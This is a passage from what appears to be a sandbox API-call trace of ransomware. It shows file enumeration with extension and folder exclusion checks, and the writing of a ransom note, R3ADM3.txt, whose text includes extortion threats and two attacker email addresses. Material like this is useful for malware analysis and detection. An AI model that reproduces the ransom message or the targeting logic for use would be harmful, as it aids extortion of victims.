ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x43aceae0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1cc000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PipeTran.dll", cAlternateFileName="")) returned 1 [0137.525] lstrcmpW (lpString1="PipeTran.dll", lpString2=".") returned 1 [0137.525] lstrcmpW (lpString1="PipeTran.dll", lpString2="..") returned 1 [0137.525] StrStrIW (lpFirst="PipeTran.dll", lpSrch=".UAKXC") returned 0x0 [0137.525] StrStrIW (lpFirst="PipeTran.dll", lpSrch=".exe") returned 0x0 [0137.525] StrStrIW (lpFirst="PipeTran.dll", lpSrch=".dll") returned=".dll" [0137.525] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57ae2850, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x57ae2850, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57ae2850, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0137.525] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0137.525] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0137.525] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0137.525] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0137.525] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0137.525] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0137.525] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0137.525] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0137.525] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0137.525] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0eb1404, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0eb1404, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0eb1404, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x13400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rtstreamsink.ax", cAlternateFileName="")) returned 1 [0137.525] lstrcmpW (lpString1="rtstreamsink.ax", lpString2=".") returned 1 [0137.525] lstrcmpW (lpString1="rtstreamsink.ax", lpString2="..") returned 1 [0137.525] StrStrIW (lpFirst="rtstreamsink.ax", lpSrch=".UAKXC") returned 0x0 [0137.525] StrStrIW (lpFirst="rtstreamsink.ax", lpSrch=".exe") returned 0x0 [0137.525] StrStrIW (lpFirst="rtstreamsink.ax", lpSrch=".dll") returned 0x0 [0137.525] StrStrIW (lpFirst="rtstreamsink.ax", lpSrch=".lnk") returned 0x0 [0137.525] StrStrIW (lpFirst="rtstreamsink.ax", lpSrch=".sys") returned 0x0 [0137.525] StrStrIW (lpFirst="rtstreamsink.ax", lpSrch=".msi") returned 0x0 [0137.525] StrStrIW (lpFirst="rtstreamsink.ax", lpSrch="R3ADM3.txt") returned 0x0 [0137.525] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd38 [0137.525] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0137.525] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebba0 [0137.525] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.525] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0137.525] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.525] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd38 | out: hHeap=0xea0000) returned 1 [0137.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeee398 [0137.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd38 [0137.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeee4f0 [0137.526] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee398 | out: hHeap=0xea0000) returned 1 [0137.526] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.526] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xce00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rtstreamsource.ax", cAlternateFileName="")) returned 1 [0137.526] lstrcmpW (lpString1="rtstreamsource.ax", lpString2=".") returned 1 [0137.526] lstrcmpW (lpString1="rtstreamsource.ax", lpString2="..") returned 1 [0137.526] StrStrIW (lpFirst="rtstreamsource.ax", lpSrch=".UAKXC") returned 0x0 [0137.526] StrStrIW (lpFirst="rtstreamsource.ax", lpSrch=".exe") returned 0x0 [0137.526] StrStrIW (lpFirst="rtstreamsource.ax", lpSrch=".dll") returned 0x0 [0137.526] StrStrIW (lpFirst="rtstreamsource.ax", lpSrch=".lnk") returned 0x0 [0137.526] StrStrIW (lpFirst="rtstreamsource.ax", lpSrch=".sys") returned 0x0 [0137.526] StrStrIW (lpFirst="rtstreamsource.ax", lpSrch=".msi") returned 0x0 [0137.526] StrStrIW (lpFirst="rtstreamsource.ax", lpSrch="R3ADM3.txt") returned 0x0 [0137.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0137.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebba0 [0137.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.526] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0137.526] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.526] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeee398 [0137.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd60 [0137.526] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeee558 [0137.527] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee398 | out: hHeap=0xea0000) returned 1 [0137.527] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.527] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd55c168a, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xd55c168a, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x499cc441, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x18208, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SecretST.TTF", cAlternateFileName="")) returned 1 [0137.527] lstrcmpW (lpString1="SecretST.TTF", lpString2=".") returned 1 [0137.527] lstrcmpW (lpString1="SecretST.TTF", lpString2="..") returned 1 [0137.527] StrStrIW (lpFirst="SecretST.TTF", lpSrch=".UAKXC") returned 0x0 [0137.527] StrStrIW (lpFirst="SecretST.TTF", lpSrch=".exe") returned 0x0 [0137.527] StrStrIW (lpFirst="SecretST.TTF", lpSrch=".dll") returned 0x0 [0137.527] StrStrIW (lpFirst="SecretST.TTF", lpSrch=".lnk") returned 0x0 [0137.527] StrStrIW (lpFirst="SecretST.TTF", lpSrch=".sys") returned 0x0 [0137.527] StrStrIW (lpFirst="SecretST.TTF", lpSrch=".msi") returned 0x0 [0137.527] StrStrIW (lpFirst="SecretST.TTF", lpSrch="R3ADM3.txt") returned 0x0 [0137.527] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd88 [0137.527] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0137.527] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebba0 [0137.527] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xed3498 [0137.527] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0137.527] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.527] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd88 | out: hHeap=0xea0000) returned 1 [0137.527] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3080 [0137.527] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd88 [0137.527] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec31e0 [0137.527] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3080 | out: hHeap=0xea0000) returned 1 [0137.527] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.527] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9f0852f1, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f0852f1, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Shared", cAlternateFileName="")) returned 1 [0137.527] lstrcmpW (lpString1="Shared", lpString2=".") returned 1 [0137.528] lstrcmpW (lpString1="Shared", lpString2="..") returned 1 [0137.528] StrStrIW (lpFirst="Shared", lpSrch="tmp") returned 0x0 [0137.528] StrStrIW (lpFirst="Shared", lpSrch="winnt") returned 0x0 [0137.528] StrStrIW (lpFirst="Shared", lpSrch="temp") returned 0x0 [0137.528] StrStrIW (lpFirst="Shared", lpSrch="thumb") returned 0x0 [0137.528] StrStrIW (lpFirst="Shared", lpSrch="$Recycle.Bin") returned 0x0 [0137.528] StrStrIW (lpFirst="Shared", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.528] StrStrIW (lpFirst="Shared", lpSrch="System Volume Information") returned 0x0 [0137.528] StrStrIW (lpFirst="Shared", lpSrch="Boot") returned 0x0 [0137.528] StrStrIW (lpFirst="Shared", lpSrch="Windows") returned 0x0 [0137.528] StrStrIW (lpFirst="Shared", lpSrch="Trend Micro") returned 0x0 [0137.528] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0137.528] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebba0 [0137.528] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xed3498 [0137.528] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0137.528] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.528] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecdb0 [0137.528] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3080 [0137.528] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.528] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x13600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="soniccolorconverter.ax", cAlternateFileName="")) returned 1 [0137.528] lstrcmpW (lpString1="soniccolorconverter.ax", lpString2=".") returned 1 [0137.528] lstrcmpW (lpString1="soniccolorconverter.ax", lpString2="..") returned 1 [0137.528] StrStrIW (lpFirst="soniccolorconverter.ax", lpSrch=".UAKXC") returned 0x0 [0137.528] StrStrIW (lpFirst="soniccolorconverter.ax", lpSrch=".exe") returned 0x0 [0137.528] StrStrIW (lpFirst="soniccolorconverter.ax", lpSrch=".dll") returned 0x0 [0137.528] StrStrIW (lpFirst="soniccolorconverter.ax", lpSrch=".lnk") returned 0x0 [0137.528] StrStrIW (lpFirst="soniccolorconverter.ax", lpSrch=".sys") returned 0x0 [0137.528] StrStrIW (lpFirst="soniccolorconverter.ax", lpSrch=".msi") returned 0x0 [0137.528] StrStrIW (lpFirst="soniccolorconverter.ax", lpSrch="R3ADM3.txt") returned 0x0 [0137.528] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.529] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0137.529] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebba0 [0137.529] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee398 [0137.529] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0137.529] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.529] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.529] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee5c0 [0137.529] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecdd8 [0137.529] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee638 [0137.529] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee5c0 | out: hHeap=0xea0000) returned 1 [0137.529] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee398 | out: hHeap=0xea0000) returned 1 [0137.529] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bdd9df, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bdd9df, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bdd9df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sonicsptransform.ax", cAlternateFileName="")) returned 1 [0137.529] lstrcmpW (lpString1="sonicsptransform.ax", lpString2=".") returned 1 [0137.529] lstrcmpW (lpString1="sonicsptransform.ax", lpString2="..") returned 1 [0137.529] StrStrIW (lpFirst="sonicsptransform.ax", lpSrch=".UAKXC") returned 0x0 [0137.529] StrStrIW (lpFirst="sonicsptransform.ax", lpSrch=".exe") returned 0x0 [0137.529] StrStrIW (lpFirst="sonicsptransform.ax", lpSrch=".dll") returned 0x0 [0137.529] StrStrIW (lpFirst="sonicsptransform.ax", lpSrch=".lnk") returned 0x0 [0137.529] StrStrIW (lpFirst="sonicsptransform.ax", lpSrch=".sys") returned 0x0 [0137.529] StrStrIW (lpFirst="sonicsptransform.ax", lpSrch=".msi") returned 0x0 [0137.529] StrStrIW (lpFirst="sonicsptransform.ax", lpSrch="R3ADM3.txt") returned 0x0 [0137.529] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.529] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0137.529] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xeebba0 [0137.529] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0137.531] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebba0 | out: hHeap=0xea0000) returned 1 [0137.531] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0137.531] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.531] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeee398 [0137.531] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeece00 [0137.531] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeee5c0 [0137.531] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee398 | out: hHeap=0xea0000) returned 1 [0137.531] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3498 | out: hHeap=0xea0000) returned 1 [0137.531] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x829f8440, ftCreationTime.dwHighDateTime=0x1d59ae8, ftLastAccessTime.dwLowDateTime=0x4a805c20, ftLastAccessTime.dwHighDateTime=0x1d5a2ee, ftLastWriteTime.dwLowDateTime=0x4a805c20, ftLastWriteTime.dwHighDateTime=0x1d5a2ee, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="totalcmd.exe", cAlternateFileName="")) returned 1 [0137.531] lstrcmpW (lpString1="totalcmd.exe", lpString2=".") returned 1 [0137.531] lstrcmpW (lpString1="totalcmd.exe", lpString2="..") returned 1 [0137.531] StrStrIW (lpFirst="totalcmd.exe", lpSrch=".UAKXC") returned 0x0 [0137.531] StrStrIW (lpFirst="totalcmd.exe", lpSrch=".exe") returned=".exe" [0137.531] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bb787f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bb787f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bdd9df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMM2CLIP.dll", cAlternateFileName="")) returned 1 [0137.531] lstrcmpW (lpString1="WMM2CLIP.dll", lpString2=".") returned 1 [0137.532] lstrcmpW (lpString1="WMM2CLIP.dll", lpString2="..") returned 1 [0137.532] StrStrIW (lpFirst="WMM2CLIP.dll", lpSrch=".UAKXC") returned 0x0 [0137.532] StrStrIW (lpFirst="WMM2CLIP.dll", lpSrch=".exe") returned 0x0 [0137.532] StrStrIW (lpFirst="WMM2CLIP.dll", lpSrch=".dll") returned=".dll" [0137.532] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bb787f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bb787f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bdd9df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMM2CLIP.dll", cAlternateFileName="")) returned 0 [0137.532] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc858 | out: hHeap=0xea0000) returned 1 [0137.532] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2ef0 | out: hHeap=0xea0000) returned 1 [0137.532] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0137.532] Sleep (dwMilliseconds=0x32) [0137.592] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0137.592] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc00 | out: hHeap=0xea0000) returned 1 [0137.592] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec31e0 [0137.592] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0137.592] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2dc0 [0137.592] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0137.592] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0137.592] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd38 [0137.592] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2cb8 [0137.592] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3340 [0137.592] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0137.592] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3340 | out: hHeap=0xea0000) returned 1 [0137.592] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2cb8 | out: hHeap=0xea0000) returned 1 [0137.592] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd38 | out: hHeap=0xea0000) returned 1 [0137.593] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\R3ADM3.txt" (normalized: "c:\\program files\\internet explorer\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0137.593] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0137.593] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0137.594] CloseHandle (hObject=0x6c4) returned 1 [0137.595] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0137.595] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0137.595] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x57ba0f30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57ba0f30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0137.595] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0137.595] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x57ba0f30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57ba0f30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0137.595] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0137.595] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0137.595] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a9cef30, ftCreationTime.dwHighDateTime=0x1d5babf, ftLastAccessTime.dwLowDateTime=0x7c33e3e0, ftLastAccessTime.dwHighDateTime=0x1d5aa87, ftLastWriteTime.dwLowDateTime=0x7c33e3e0, ftLastWriteTime.dwHighDateTime=0x1d5aa87, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="active-charge.exe", cAlternateFileName="ACTIVE~1.EXE")) returned 1 [0137.595] lstrcmpW (lpString1="active-charge.exe", lpString2=".") returned 1 [0137.595] lstrcmpW (lpString1="active-charge.exe", lpString2="..") returned 1 [0137.595] StrStrIW (lpFirst="active-charge.exe", lpSrch=".UAKXC") returned 0x0 [0137.595] StrStrIW (lpFirst="active-charge.exe", lpSrch=".exe") returned=".exe" [0137.595] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0137.595] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0137.595] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0137.595] StrStrIW (lpFirst="en-US", lpSrch="tmp") returned 0x0 [0137.595] StrStrIW (lpFirst="en-US", lpSrch="winnt") returned 0x0 [0137.595] StrStrIW (lpFirst="en-US", lpSrch="temp") returned 0x0 [0137.595] StrStrIW (lpFirst="en-US", lpSrch="thumb") returned 0x0 [0137.595] StrStrIW (lpFirst="en-US", lpSrch="$Recycle.Bin") returned 0x0 [0137.595] StrStrIW (lpFirst="en-US", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.595] StrStrIW (lpFirst="en-US", lpSrch="System Volume Information") returned 0x0 [0137.595] StrStrIW (lpFirst="en-US", lpSrch="Boot") returned 0x0 [0137.595] StrStrIW (lpFirst="en-US", lpSrch="Windows") returned 0x0 [0137.595] StrStrIW (lpFirst="en-US", lpSrch="Trend Micro") returned 0x0 [0137.596] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0137.596] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2cb8 [0137.596] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 